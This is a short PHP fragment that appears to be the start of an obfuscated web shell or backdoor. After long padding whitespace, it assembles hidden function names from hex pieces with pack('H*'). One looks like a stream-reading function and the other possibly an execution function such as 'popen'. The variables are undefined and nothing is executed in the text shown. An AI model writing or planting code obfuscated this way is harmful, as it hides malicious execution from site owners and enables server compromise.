<?php																																										
 
$rjust6 = pack("H*", '73'.'74'.$parameter8.$parameter4.$parameter9.'6d'.$parameter10.$parameter11.$parameter4.'74'.$parameter10.$parameter12.'6f'.'6e'.'74'.$parameter4.'6e'.'74'.$parameter1);
$rjust7 = pack("H*", '70'.$parameter12.$parameter13.'6f'.$parameter1.$parameter4);

